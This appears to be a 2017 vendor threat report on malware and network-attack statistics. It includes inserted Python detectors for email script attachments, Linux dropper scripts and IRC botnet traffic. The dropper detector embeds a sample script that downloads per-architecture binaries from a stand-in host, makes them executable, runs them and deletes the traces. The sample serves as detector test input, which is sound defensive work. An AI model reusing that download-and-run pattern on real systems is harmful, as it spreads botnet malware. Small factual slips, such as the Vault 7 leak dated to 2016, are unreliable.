Internet Security Report QUARTER 1, 2017

The Firebox Feed provides quantifiable data and trends about hackers’ latest attacks, and understanding these trends can help us improve our defenses.

Contents

03 Introduction
04 Executive Summary
05 Firebox Feed Statistics
07 Malware Trends
08 Quarter-over-Quarter Malware Comparison
08 Malicious JavaScript Still Menaces
09 A Rise in Linux Malware
11 Evil Cross-platform Java Malware
11 Old Attacks: Malicious Perl Bot
12 A Pair of Generic Windows Trojans
12 Malicious Macros Hide in the Weeds
13 Geographic Malware Distribution
14 Zero Day vs Known Malware
15 Network Attack Trends
15 Top Network Attacks
16 Quarter-over-Quarter Attack Comparison
16 Web Battleground Shifts to Servers
16 Web Application Attacks Move Up
17 StageFright Returns to the Spotlight
18 Geographic Attack Distribution
20 Firebox Feed Statistics: Defense Learnings
20 Malicious JavaScript in Email
20 Web-based Linux Malware
20 Brazilian Banking Malware Campaign
21 Top Security Incidents
22 The CIA Vault 7 Leaks
25 Marble Framework Defense Learnings
26 WatchGuard Threat Lab’s IoT Research Project
27 Responsible Disclosure: Ouvis C2 HD Security Camera
31 IoT Research: Defensive Learnings
32 Conclusion & Defense Highlights

Internet Security Report: Q1 2017 • 2

Introduction

Have you ever wondered what types of cyber attacks affect small to midsize businesses (SMBs) and distributed enterprises (DEs)? Well, you’ve come to the right place.

WatchGuard’s Internet Security Report is based on Firebox Feed data coming from more than 26,000 unified threat management (UTM) appliances that are monitoring and protecting SMBs and distributed enterprises around the world. This data gives us interesting insights into what types of network exploits, malware infections, and advanced attacks are launched by cyber criminals every month, and how they change and update their attacks over time. We share these trends and insights with you every quarter in our Internet Security Report.

The report for Q1 2017 includes:

05 Many trends and discoveries from the Firebox Feed. What types of malware do we catch most often in the wild? Which network services do attackers commonly target? What are the most popular attacks in different regions of the world? Which delivery mechanisms do cyber criminals most regularly rely on? You can learn all this and more in our Firebox Feed Statistics section.

11 Top Story: CIA Vault 7 leaks. Every quarter, you’re flooded with interesting and relevant information, security stories and incidents. Some of them can have industry-wide effects. This quarter our researchers comment on the CIA Vault 7 leak from Q1 2016 and share some additional technical analysis you didn’t see in the news.

22 Latest Internet of Things (IoT) research. The WatchGuard Threat Lab constantly runs security research projects to study the threats and issues affecting businesses today. For the last few quarters, our researchers have been analyzing the security of consumer IoT devices. This quarter we disclose a vulnerability we found in the Ouvis C2 HD Security Camera.

33 Most importantly, defensive learnings. While some might consider the threat landscape interesting on anecdotal merit alone, you can put these trends and learnings to good use. We share these trends and findings so that you can tailor your defenses to the latest attacks. We share various protective tips throughout this report, and summarize with our top learnings.

We’re excited to share our second report based on data analysis from our Firebox Feed, and our additional research projects. We believe this quantifiable data gives us a deeper insight into the most prevalent threats our customers face and how cyber criminals craft their latest attacks. Our quarter-over-quarter analysis also shows how attackers evolve their techniques and focus over time. We hope this report provides useful information, and that you make it a regular part of your InfoSec awareness and training. Thanks for joining us this quarter, and read on for our latest threat landscape findings.

Executive Summary

Even when malware declines, other attacks rise.

Consumers and businesses are under a constant deluge of network attacks, phishing, and malware. Criminals target Brazilian banks, nation-states anonymize their tools, and advanced threats get past legacy defenses. If you want to keep your business online, you need to stay vigilant against these attack trends so you can identify defenses for them.

This report provides some details around those and other trends. Here’s a high-level summary of some of the things you’ll learn from this report:

• Linux malware is on the rise, making up 36% of the top malware we detected in Q1 (if you count PERL/Shellbot). We believe this increase comes from attackers targeting IoT devices.

• Legacy AV missed 38% of malware. In Q4, signature-based AV missed 30% of the threats we caught overall. This quarter, those misses increased 8% despite a general decline in malware detection overall. This means increasingly more malware evades traditional AV solutions.

• Threat actors take a break from hacking the holidays. Overall, threat volume decreased 52% in Q1 2017 compared to Q4 2016. We believe the drop in malware detections can be attributed to the absence of seasonal malware campaigns associated with various Q4 holidays, which increased overall malware instances during that period.

• Conversely, network attacks are up 37% compared to Q4, likely due to automated tools that always look for new victims.

• The web battleground shifted towards web servers. Last quarter, we saw more exploits that were used for drive-by downloads (web client attacks). In Q1, 82% of the top network attacks targeted web servers (or other web-based services).

• Our top ten XSS attack primarily targeted Spain. We aren’t sure why this particular cross-site scripting exploit was popular in Spain, but it was.

• Attackers still exploit the Android StageFright flaw. A mobile device vulnerability cracked our top ten attack list this quarter, breaking the previously unchallenged web attack theme.

• Criminals target Brazilian banks with cross-platform malware. We detected a large amount of email-based Java malware sent to victims in Brazil. We suspect this is part of the well-known Banloader banking malware campaign.

Those are just a few of the many trends this report explores. Read on for more in-depth explanations and

In Q1 2017, WatchGuard blocked over 7,072,178 malware variants (266 per device)* and 4,151,210 network attacks (156 per device)*.

* average per participating device

Firebox Feed Statistics

The threat landscape does not stand still. Cyber criminals constantly change their tools, tactics, and campaigns to exploit the most opportune attack techniques of the time. Savvy attackers pay attention to seasonal events, pop culture, and other technological trends to leverage the latest tricks to hack more victims. To keep up your defenses, you must remain aware of the latest threat trends. Using this report, you can fine-tune your defenses to block the latest threats.

WatchGuard’s Firebox Feed provides quantifiable data about the latest malware and network attacks globally. The feed is a database of anonymized threat data gathered from tens of thousands of active Fireboxes around the globe. It records the latest malware from our Gateway AntiVirus (GAV) and APT Blocker services, and it archives the most prevalent network attacks blocked by our Intrusion Prevention Service (IPS). It also records location data to learn how different threats affect different geographic regions. It doesn’t, however, capture any sensitive data about our customers’ networks or configurations, and allows customers to opt out of this feed whenever they like.

The Firebox Feed currently only captures data from a fraction of our customers, since it relies on customers running the latest versions of our firmware. However, with information from over 26,000 devices, the Firebox Feed provides a statistically relevant view into today’s threats.

This section of the report highlights the malware and network attack trends our Firebox Feed uncovered in Q1 2017. Here we share our analysis of these trends, and provide defense tips that help you avoid the latest malware and attacks.



Malware Trends

Most cyber attacks involve malware. After breaching your network, criminals usually want to establish “persistence,” meaning they want to find a way to retain access to your computer and network. Typically, they install malware to retain this persistence. This section details the malware-specific trends from our Q1 2017 data.

Let’s start with the raw Q1 2017 numbers:

• The Firebox Feed recorded threat data from 26,584 active Fireboxes; a 7.7% increase over the number of Firebox devices reporting in Q4 2016.

• Our GAV service blocked 7,072,178 malware variants; representing an average of 266 malware samples blocked per Firebox. This represents a 52% decline in overall malware compared to last quarter, and a 56% decline in malware blocked per Firebox.

• APT Blocker stopped an additional 2,568,727 malware variants; representing a 34% decline from last quarter.

Our malware data comes from two Firebox services:

• The basic Gateway AntiVirus (GAV) service, which uses signatures and static heuristics to catch known malware.

• APT Blocker, our advanced malware prevention service, which uses behavior detection to catch new or “zero day” malware.

Figure 1: Top Ten Firebox GAV Hits for Q1 2017

COUNT | THREAT NAME | CATEGORY
670,261 | FakeAlert | Generic Dropper
356,809 | PERL/ShellBot | PERL IRC Bot
256,390 | JS/Downloader.Agent | Malicious JavaScript
178,551 | Linux/Exploit | Generic Linux Trojan
165,996 | Win32/Heur | Generic Trojan
158,689 | Linux/Downloader | Generic Linux Downloader
156,645 | JS/Heur | Malicious JavaScript
83,123 | Java/Downloader | Generic Java Downloader
82,127 | Linux/Flooder | Generic Linux DDoS Tool
77,704 | Generic36.AAVT | Generic Bitcoin Miner

Looking at those numbers, the first thing you notice is that malware detection dropped by about half, despite the Firebox Feed having almost two thousand more devices reporting in. Why is that? We suspect this decline has to do with the seasonality of malware campaigns. The last quarter of the year includes many regional and global holidays, such as Thanksgiving and Christmas. Many of these holidays involve major shopping periods and retail events like Cyber Monday and Black Tuesday. Due to this increased spending, attackers specifically target these holiday and shopping periods, which probably accounts for the higher malware rates last quarter. As we continue our report annually, we’ll follow this trend to see if holiday-related malware increases are common year-over-year.

Besides the obvious decrease in overall malware, we also noticed a relative increase in advanced malware. While APT Blocker detections decreased in Q1, they decreased relatively less compared to the decline in GAV detections (a 34% decline compared to GAV’s 52%). In general, that means more malware got past legacy AV this quarter, and required advanced malware detection techniques to block. This seems to suggest that more threat actors are actively creating malware that evades legacy protections.

Rather than analyzing these ten samples individually, we’ll share the high-level trends they represent, and go into more detail about some of the samples.

Network vs Endpoint Malware Detection: To evade detection technologies, modern malware arrives in multiple stages. Rather than directly sending you ransomware, attackers might send you a document, that links to a website, that opens a malicious Java file, that installs a dropper or downloader, which finally downloads the actual ransomware onto the endpoint. This means network AV solutions detect and block malware at different stages in this delivery process than endpoint AV. Network AV primarily “sees” the initial droppers and downloaders from the initial infection stages, whereas endpoint AV may see the final malware. For more on multi-stage malware, see this great post from IBM X-Force.

Quarter-Over-Quarter Malware Analysis

Only four of the malware samples from our Q4 2016 report made it to this quarter’s top ten. Specifically:

• FakeAlert

• Linux/Exploit

• JS/Downloader.Agent

• JS/Heur

Two of those threats traded places for relevance. Last quarter, Linux/Exploit was the number one threat, and a good indicator of increased IoT attacks. This quarter, it’s still relevant, but has dropped below FakeAlert, which took over the top spot. If you’d like to know more about either of these two samples, see the malware section of last quarter’s Internet Security Report. Meanwhile, the top JavaScript threats from last quarter remain as relevant this quarter, which we detail next.

Malicious JavaScript Still Menaces

JavaScript is a high-level scripting language most commonly used on dynamic websites. While web applications legitimately use JavaScript, attackers commonly abuse it to help deliver malware. Specifically, criminals tend to exploit malicious JavaScript in two ways; either as malicious code embedded on a website, or as malicious files sent via email.

For the second quarter in a row, JavaScript malware made up a large portion of the Firebox Feed top statistics. Like last quarter, JS/Downloader.Agent and JS/Heur both made our top ten list. Furthermore, we continued to see many other malicious JavaScript samples throughout our full top 100. In short, our malware services block a lot of malicious JavaScript.

As mentioned before, malicious JavaScript is either hosted directly on a malicious website to facilitate drive-by-download attacks, or delivered as an attachment in a convincing phishing email. In the email scenario, JavaScript malware typically acts as the first-stage dropper in a multi-stage attack. Malware authors hope their victims run the malicious JavaScript so it can download the second stage malware, which might be ransomware or a remote access trojan (RAT). In the case of web attacks, criminals use JavaScript to launch browser and software exploits. In fact, some of the samples our Fireboxes detected are associated with web-based exploit kits like Angler, Neutrino, and RIG, which have previously delivered ransomware like Locky and Nemucod.

Our data shows that malicious JavaScript plays a big role in modern malware delivery, both over the web and through email. Make sure you have security controls that can identify malicious JavaScript, including web reputation and advanced malware protection services. We also encourage advanced users to look into extensions like NoScript and SafeScript, which can help you limit JavaScript while also letting legitimate sites work. Finally, make sure your users know never to open .JS files from an email.
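The last piece of advice above, enforced at the mail gateway instead of left to the user, as an added example that is not WatchGuard code: parse an inbound message, flag script attachments (including double extensions such as invoice.pdf.js and scripts wrapped in a ZIP), and return the names to hand to a quarantine step. The extension list and the sample message are this example's own constructions.

```python
"""Flag first-stage script attachments in inbound email.

Added example (not WatchGuard code). The extension list below is an
assumption of this example, not a GAV signature; the sample message is
constructed and its "scripts" are inert comment text.
"""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Windows Script Host / HTML Application types commonly mailed as droppers.
RISKY_EXTENSIONS = {".js", ".jse", ".wsf", ".wsh", ".vbs", ".vbe", ".hta"}
ARCHIVE_EXTENSIONS = (".zip",)


def risky_name(filename):
    """True if the *last* extension is a script type.

    Catches double extensions such as 'invoice.pdf.js', which a user with
    'hide known extensions' enabled sees as 'invoice.pdf'.
    """
    name = filename.lower().strip()
    dot = name.rfind(".")
    return dot != -1 and name[dot:] in RISKY_EXTENSIONS


def risky_names_in_zip(data):
    """Return the member names inside a ZIP that risky_name() would flag."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return [n for n in archive.namelist() if risky_name(n)]
    except zipfile.BadZipFile:
        return []


def flagged_attachments(raw_message):
    """Return (attachment name, reason) pairs for a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        if risky_name(name):
            findings.append((name, "script attachment"))
        elif name.lower().endswith(ARCHIVE_EXTENSIONS):
            inner = risky_names_in_zip(payload)
            if inner:
                findings.append((name, "archive contains " + ", ".join(inner)))
    return findings


def build_sample_message():
    """Constructed phishing-style message: a .js posing as an invoice, a ZIP
    wrapping a .jse, and a harmless PDF that must not be flagged."""
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(b"// constructed placeholder, not malware\n",
                       maintype="application", subtype="octet-stream",
                       filename="Invoice_2017_Q1.pdf.js")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("scan_0421.jse", "// constructed placeholder\n")
        archive.writestr("readme.txt", "nothing to see")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="scans.zip")
    msg.add_attachment(b"%PDF-1.4 constructed", maintype="application",
                       subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reason in flagged_attachments(build_sample_message()):
        print(f"QUARANTINE {name}: {reason}")
```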


A Rise in Linux Malware

At least three of the top ten malware samples this quarter target Linux, showing that cyber criminals are focusing on this platform, likely for IoT-related attacks.

Last quarter, Linux/Exploit was the number one malware sample blocked. While it dropped to number four this quarter, it’s joined by two other Linux threats; Linux/Downloader and Linux/Flooder. Combined, these three hits show attackers are increasingly targeting Linux systems.

Here’s a quick description of each threat:

1. Linux/Exploit is a generic detection rule that catches several executable Linux (ELF) trojans. You can read more about it in our last report. In general, these trojans infect a device, and then scan networks looking for any other devices hosting Telnet or SSH services. Once the Telnet or SSH host devices are identified, the trojan attempts to log in to them using default credentials or via brute force. Once they have access, they hijack the device by either downloading a copy of a malicious Linux executable (which could be Linux/Exploit) or by running a script to add the host to a growing botnet (à la the Mirai botnet).

ALTERNATE NAMES: Linux.CornelGEN, Script.Trojan.Agent

2. Linux/Downloader joined the top ten malware list this quarter. Linux/Downloader is a signature that generically catches common Linux dropper or downloader shell scripts. Rather than catching malicious Linux executables (ELF files) like Linux/Exploit, this signature catches the malicious shell scripts that some attackers (or trojans) run to download and install additional malware onto a hijacked Linux device.

Linux runs on many different architectures, such as ARM, MIPS, and traditional x86 chipsets. An executable compiled for one architecture will not run on a device running a different one. Thus, some Linux attacks use dropper shell scripts to download and install the proper malicious components for the architecture they are infecting. Here’s a sample of one of the many Linux downloader scripts caught by this signature.

ALTERNATE NAMES: Linux/TrojanDownloader, Linux/ShellDLoader, Trojan-Downloader.Shell.Agent

Figure 2: Example of malicious Linux shell script caught by Linux/Downloader


3. Linux/Flooder also joined the Q1 top ten malware list. This is another generic signature that catches Linux-based distributed denial of service (DDoS) tools. For instance, it catches tools like the publicly released Tsunami tool. Tsunami is a command line Linux tool designed to carry out DNS amplification attacks. It’s based on an open source DNS relay scanner called namescan. This is one of the many possible Linux-based CLI DDoS tools.

Linux/Flooder may also catch the DDoS tools used by Linux-based botnets, like Mirai. As the Mirai botnet showed us, Linux-based IoT devices are a prime target for botnet armies. These networked trojans often include tools for DDoS attacks, as shown below.

Figure 3: Mirai Command and Control Server

ALTERNATE NAMES: Dos.Linux.Agent, Linux.Flood, Trojan.Linux.Flooder, Linux/Dnsamp, Linux.BackDoor.Tsunami

As an aside, one might argue that the PERL/ShellBot variant we describe below also qualifies as Linux malware, since it primarily targets Linux systems. This is because they tend to have Perl installed by default. However, we decided to leave it out of this section, and describe it in more detail later in this report.

In summary, Linux attacks and malware are on the rise. We believe this is because systemic weaknesses in IoT devices, paired with their rapid growth, are steering botnet authors towards the Linux platform. Owners of Linux-based devices, including IoT hosts and traditional Linux servers, should ensure they properly secure their systems from external attacks. Blocking inbound Telnet and SSH, along with using complex administrative passwords, can prevent the vast majority of potential attacks.
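A heuristic for the dropper pattern described under Linux/Downloader above (fetch a binary, mark it executable, run it, repeated for several CPU architectures), added here as an example and not the GAV signature itself. It goes a step beyond the text by contrasting a dropper with a single-architecture installer and a multi-architecture build script, so that architecture names alone do not trigger. The trait list and all three sample scripts are constructed for this example; the hosts end in .invalid.

```python
"""Heuristic detection of multi-architecture Linux dropper shell scripts.

Added example (not WatchGuard's Linux/Downloader signature). Trait regexes
and sample scripts are this example's assumptions.
"""
import re

# Architecture names that appear in the payload file names these droppers
# fetch. Longest first so "mipsel" and "x86_64" win over "mips" and "x86".
ARCH_TOKENS = sorted(
    ("mips", "mipsel", "arm", "arm5", "arm6", "arm7", "x86", "x86_64",
     "i586", "i686", "ppc", "sh4", "m68k", "sparc"),
    key=len, reverse=True)
ARCH_RE = re.compile(
    r"(?<![a-z0-9])(" + "|".join(ARCH_TOKENS) + r")(?![a-z0-9])",
    re.IGNORECASE)
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")
# Running something from the current directory, at line start or after ; & |
EXEC_RE = re.compile(r"(^\s*|[;&|]\s*)\./\S+", re.MULTILINE)
TMPDIR_RE = re.compile(r"(/tmp|/var/tmp|/var/run|/dev/shm)\b")
CLEANUP_RE = re.compile(r"\brm\s+-[rf]{1,2}\b")


def analyze_script(text):
    """Return (traits, is_dropper) for the text of a shell script."""
    arches = sorted({m.group(1).lower() for m in ARCH_RE.finditer(text)})
    traits = {
        "fetches_remote_file": bool(FETCH_RE.search(text)),
        "marks_executable": bool(CHMOD_RE.search(text)),
        "executes_local_file": bool(EXEC_RE.search(text)),
        "works_in_scratch_dir": bool(TMPDIR_RE.search(text)),
        "removes_traces": bool(CLEANUP_RE.search(text)),
        "architectures": arches,
    }
    # The fetch -> chmod -> run chain is the minimum. Architecture names
    # alone (a build script) or a fetch alone (an installer) must not trip it;
    # several architectures, or scratch-dir use plus self-cleanup, confirm it.
    chain = (traits["fetches_remote_file"] and traits["marks_executable"]
             and traits["executes_local_file"])
    supporting = traits["works_in_scratch_dir"] + traits["removes_traces"]
    is_dropper = chain and (len(arches) >= 2 or supporting == 2)
    return traits, is_dropper


# Constructed sample: the per-architecture fetch/chmod/run loop the report
# describes. The host does not exist and the loop is never executed here.
DROPPER_SAMPLE = """#!/bin/sh
cd /tmp || cd /var/run
for a in mips mipsel arm7 x86; do
  wget http://dropper.example.invalid/bins/bot.$a -O bot.$a
  chmod +x bot.$a
  ./bot.$a
done
rm -rf bot.*
"""

# Constructed benign installer: one architecture, checksum verified, no chmod.
INSTALLER_SAMPLE = """#!/bin/sh
curl -fsSL https://downloads.example.invalid/tool-1.0-x86_64.tar.gz -o tool.tgz
sha256sum -c tool.tgz.sha256
tar xzf tool.tgz && ./tool/install.sh
"""

# Constructed benign build script: many architectures, nothing fetched.
BUILD_SAMPLE = """#!/bin/sh
for a in arm x86 mips; do
  make ARCH=$a all
done
"""


if __name__ == "__main__":
    for label, sample in (("dropper", DROPPER_SAMPLE),
                          ("installer", INSTALLER_SAMPLE),
                          ("build", BUILD_SAMPLE)):
        traits, verdict = analyze_script(sample)
        print(f"{label}: dropper={verdict} arches={traits['architectures']}")
```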


Evil Cross-platform Java Malware

Java is a general-purpose programming language that is designed to run on many platforms. Originally created by Sun Microsystems (now owned by Oracle), Java is one of the most popular programming languages used today. Everything from web applications, to mobile devices, to normal client software uses Java. People often confuse Java for JavaScript, but they are quite different. JavaScript is a high-level, runtime scripting language.

Unfortunately, Java has also developed a reputation for insecurity. Over the years, researchers have found countless vulnerabilities in the Java platform, many of which allow attackers to bypass its built-in sandbox, which is there to protect users. Furthermore, sophisticated attackers are drawn to Java because it runs equally well on Windows, Mac, and Linux devices. Attackers exploit Java downloaders in cross-platform attacks.

While Java threats were very common a few years ago, this is the first time we’ve seen a Java threat make our top ten list. Java/Downloader is a universal signature that detects generic Java downloaders. These bits of malicious code try to fingerprint a victim’s operating system (OS), and then install the corresponding malicious payload.

The most recent samples caught by Java/Downloader are associated with a cross-platform trojan called Banload, which targets South American banks. This banking trojan infects both Windows and Macintosh computers using this malicious Java code. Our geographic data confirms this increase likely relates to a South American bank attack campaign. We’ll share more about this in our Geographic Distribution section.

JAVA/DOWNLOADER INFO:
• Generic Java downloader
• Related to banking malware (Banload)
• Alternate names: Java.Trojan.Generic, Java:Malware-gen, Java/Banload.U, Mal/DrodZp-A, TrojanDownloader.Java

Old Attacks: Malicious Perl Shellbots

Last quarter, an old-style threat called a PHP webshell made our top ten malware list. This quarter that threat dropped entirely off our top 100 list, only to get replaced with another outdated threat – PERL/ShellBot.

PERL/ShellBot is a broad signature made to detect malicious bots written in Perl (a high-level programming language). Though Perl bots can run on any platform with Perl installed, they tend to affect Linux computers because they often install Perl by default.

These malicious bots use the Internet Relay Chat (IRC) service as a command and control (C&C) channel for the attacker. Some of these malicious Perl shellbots connect to IRC using the default port, 6667. However, others use non-standard IRC ports like 23, or 3333, presumably to help avoid detection.

Like a normal botnet, attackers can leverage Perl bots for just about any nefarious purpose, including but not limited to DDoS attacks. Source code for many Perl Shellbots has leaked publicly, resulting in many variants based on the originals. Below is a GitHub page for one such sample used for DDoS attacks.

PERL/SHELLBOT INFO:
• Perl-based IRC bot
• Related to ShellShock attack
• Alternate names: Backdoor.Perl.Shellbot, /ShellBot, Trojan.Perl.Shellbot

Figure 4: Example of publicly available DDoS Perl bot

In late 2014, a critical Linux Bash vulnerability surfaced called ShellShock. This flaw made it trivial for attackers to gain full root privileges on any Linux server that exposed Bash. At the time, attackers updated their malicious Perl bots to target this ShellShock vulnerability. Some of the samples we see associated with recent PERL/ShellBot detections are targeting this ShellShock vulnerability. If you haven’t already patched your Linux systems for ShellShock, you should do so immediately.

A Pair of Generic Windows Trojans

To round out our top ten list, we also saw a pair of signatures that catch generic Windows trojans.

• Win32/Heur is about as generic a signature as you get, and is known to catch many Windows-based trojans, from Zbot and Zeus to Razy.

• Generic36.AAVT is also a broad signature that catches Windows-specific malware. However, it’s more specifically associated with Bitcoin Miner trojans. This suggests a slight uptick in attackers delivering Bitcoin mining malware in some regions.

Malicious Macros Hide in the Weeds

Unlike last quarter, malicious macro-based Word documents did not make our top ten list. There was a clear decline in overall malicious macro documents in Q1. However, they’re still worth mentioning since we see these malicious documents sprinkled throughout our wider top 100 list.

Despite their decline, we recommend you continue to warn your users against unsolicited documents, and tell them not to enable macros if they do open strange documents. See our last report for more information on this waning threat.
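Detection logic for the PERL/ShellBot command-and-control behaviour described in the Perl section above, added as an example rather than WatchGuard code: a port-only rule sees the bot on 6667, while matching the IRC client registration (NICK and USER) in the payload preview also catches the same handshake on 3333 and leaves a plain Telnet option negotiation on port 23 alone. The key=value log format and every log line are constructed for this example, with hosts from documentation address ranges.

```python
"""Spot IRC command-and-control in connection logs, on any port.

Added example (not WatchGuard detection logic). The log format and the
sample lines are this example's constructions.
"""
import re

IRC_DEFAULT_PORTS = {6667, 6697}
# IRC client registration per RFC 2812: PASS (optional), NICK, USER, then JOIN.
IRC_CMD_RE = re.compile(r"^(PASS|NICK|USER|JOIN) \S+")
# key=value fields; the payload preview is quoted, with CRLF written as the
# four characters \r\n and non-printable bytes as \xNN.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

# Constructed lines: 1 = bot on the default IRC port, 2 = same handshake on
# 3333, 3 = Telnet option negotiation on 23, 4 = TLS ClientHello, 5 = HTTP.
SAMPLE_LOG = r"""ts=2017-02-03T10:01:07Z src=10.20.0.15 dst=198.51.100.7 dport=6667 proto=tcp payload="NICK [A]bot|1921\r\nUSER bot 8 * :bot\r\n"
ts=2017-02-03T10:01:09Z src=10.20.0.15 dst=203.0.113.44 dport=3333 proto=tcp payload="PASS s3cret\r\nNICK ub|4433\r\nUSER ub 8 * :ub\r\nJOIN #c\r\n"
ts=2017-02-03T10:02:31Z src=10.20.0.22 dst=203.0.113.9 dport=23 proto=tcp payload="\xff\xfb\x18\xff\xfb\x1f"
ts=2017-02-03T10:03:02Z src=10.20.0.22 dst=192.0.2.80 dport=443 proto=tcp payload="\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"
ts=2017-02-03T10:04:10Z src=10.20.0.31 dst=192.0.2.25 dport=80 proto=tcp payload="GET /index.html HTTP/1.1\r\nHost: www.example.invalid\r\n"
"""


def parse_line(line):
    """Parse one key=value log line into a dict; dport becomes an int."""
    record = {}
    for key, raw, quoted in FIELD_RE.findall(line):
        record[key] = quoted if raw.startswith('"') else raw
    record["dport"] = int(record["dport"])
    return record


def irc_handshake(payload):
    """True if the payload preview opens with an IRC client registration.

    Messages are read in order and stop at the first non-IRC one, so a
    NICK/USER pair deep inside unrelated data does not count.
    """
    commands = []
    for message in payload.split("\\r\\n"):
        match = IRC_CMD_RE.match(message)
        if not match:
            break
        commands.append(match.group(1))
    return "NICK" in commands and "USER" in commands


def classify(record):
    """Return a verdict for one parsed connection record."""
    irc = irc_handshake(record["payload"])
    on_default_port = record["dport"] in IRC_DEFAULT_PORTS
    if irc and on_default_port:
        return "irc-c2-default-port"
    if irc:
        return "irc-c2-nonstandard-port"
    if on_default_port:
        return "irc-port-no-handshake"  # worth a look, not conclusive
    return "benign"


def detect(log_text):
    """Return (src, dst, dport, verdict) for each line that is not benign."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = parse_line(line)
        verdict = classify(record)
        if verdict != "benign":
            hits.append((record["src"], record["dst"], record["dport"], verdict))
    return hits


def port_only_rule(log_text):
    """The naive comparison: flag the default IRC ports and nothing else."""
    records = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [(r["src"], r["dst"], r["dport"]) for r in records
            if r["dport"] in IRC_DEFAULT_PORTS]


if __name__ == "__main__":
    print("port-only rule:", port_only_rule(SAMPLE_LOG))
    for hit in detect(SAMPLE_LOG):
        print("handshake rule:", hit)
```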


Geographic Malware Distribution

Overall, we see more malware blocked in EMEA than anywhere else, with over 56% of malware caught in this region. This continues the same overall regional trend from last quarter. While this could have to do with the sales and licensing of our products (APT Blocker is popular in Europe), it could also suggest criminals are launching more European malware campaigns.

Our regional trends change for the remaining percentage of malware though. Last quarter, most of the remaining malware affected the Americas, with only 6% of malware found in APAC. This quarter, the remaining malware is split evenly between the Americas and APAC, at approximately 22% each. This marks a significant increase in threats affecting the Asia-Pacific.

We also saw quite a few standout geographic trends for individual malware variants:

1. We primarily found PERL/ShellBot in two countries. 53% of the hits were found in Malaysia, 36.7% were found in the United States, and the remaining 10.3% was distributed throughout eleven other countries. It’s unclear why these Perl bots are primarily targeting Malaysia and the United States.

2. 84% of Win32/Heur was found in India.

3. The generic Bitcoin miner (Generic36.AAVT) primarily targeted Canada, with 95% of the detections.

4. 97% of our Java/Downloader detections were from Brazil, confirming this threat is associated with a known banking malware campaign targeting Brazilian banks.

5. The Linux threats display a wide range of geographic curiosities.

 a. Linux/Exploit affected many European and American countries, but had the highest numbers in the U.S. and the United Arab Emirates.

 b. Linux/Downloader mostly affected Germany, Great Britain, and Malaysia, but few others to the same extent.

 c. Finally, Linux/Flooder primarily affected Germany and France.

6. The JavaScript malware was found in a wide range of countries, but Germany always led the list.

7. Though FakeAlert was found in over 100 countries, 44% came from Italy.

Malware affects all countries to some extent, but it is interesting to see certain threats only affect specific countries or regions. Pay close attention to the most prominent threats by region, and consider adjusting your defenses accordingly.

Figure 5: Malware detection by region (EMEA 56.6%; APAC and the Americas roughly 22% each, at 21.8% and 21.6%)


Zero Day vs Known Malware

As mentioned in the sidebar above, Firebox customers can also use our optional APT Blocker service to catch more advanced malware. APT Blocker runs suspicious files in a next-generation cloud sandbox, and monitors their behaviors to identify zero day malware that would be missed by signature-based detection solutions. When our GAV service doesn’t detect anything bad, our Firebox can still run additional APT Blocker checks to find brand new threats.

By definition, if APT Blocker catches a threat, signature-based GAV missed it. By comparing these two services, you get a good idea of the ratio between newer “zero day malware,” which legacy AV solutions might miss, and known malware.

That said, not all our customers have APT Blocker. For a one-to-one comparison, we count the total GAV hits only on boxes that have APT Blocker. According to our Firebox Feed, GAV found 4,198,242 known malware variants on boxes that also had APT Blocker. Meanwhile, APT Blocker prevented 2,568,021 new malware variants on these same devices. This means at least 38% of the malware our systems discovered was zero day, and missed by legacy AV solutions.

This illustrates the critical importance of advanced, behavior-based malware detection solutions today. Without them, AV solutions could miss more than one third of the malware spreading online. This is why so many networks that use basic AV become victims of threats like ransomware. We highly recommend you leverage advanced malware solutions like WatchGuard’s APT Blocker.

Figure 6: Known vs Zero Day Malware

38% OF MALWARE WAS ZERO DAY


Network Attack Trends

To deliver malware, attackers must either rely on the mistakes of users, or take advantage of vulnerabilities found in network software. In the case of software vulnerabilities, WatchGuard’s Intrusion Prevention Service (IPS) is designed to detect these client and server-side exploits, and prevent them from working. This section of the report highlights the top network attacks.

At a high level, our IPS service blocked 4,151,210 network attacks, which averages to 156 intrusion attempts per Firebox customer. This represents around a 37% increase in the overall blocked network attacks this quarter compared to Q4. While cyber criminals may not have launched as many massive malware campaigns, it appears that other types of attacks are on the rise.

Below are the top network threats seen during this period. Rather than analyzing each individual exploit (see the links in the chart if you want more detail), let’s look at quarter-over-quarter differences and overall trends.

Figure 7: Top Ten IPS Hits Q1 2017

Share of the top ten IPS hits, in the order of the table below: 40.6%, 14.7%, 9%, 9%, 8.8%, 5.3%, 3.8%, 3.6%, 2.8%, and 2.4%.

Signature Name | Threat Category | Affected Products | CVE Number | Count
WEB URI Handler Buffer Overflow - POST -1 | Web Server | Windows web servers | CVE-2011-1965 | 532,565
WEB HTTP Basic Authorization Header Buffer Overflow | Web Server | All web servers | CVE-2009-0183 | 192,899
WEB Nginx HTTP_parse_chunked Buffer Overflow(1) | Web Server | Nginx | CVE-2013-2028 | 118,576
WEB HTTP Host Header Buffer Overflow | Web Server | Apache | CVE-2003-0245 | 117,706
WEB Cross-site Scripting -36 | Web Client | Any web application | CVE-2011-2133 | 115,446
WEB Brute Force Login -1 | Web Server | Web app logins | n/a | 68,806
WEB-CLIENT Javascript Obfuscation in EKs - 75 | Web Client | All web browsers | Multiple CVEs | 49,376
WEB NetBSD tnftp fetch_url Command Execution(2) | Web-based FTP | tnftp (Apple, NetBSD, Linux) | CVE-2014-8517 | 47,076
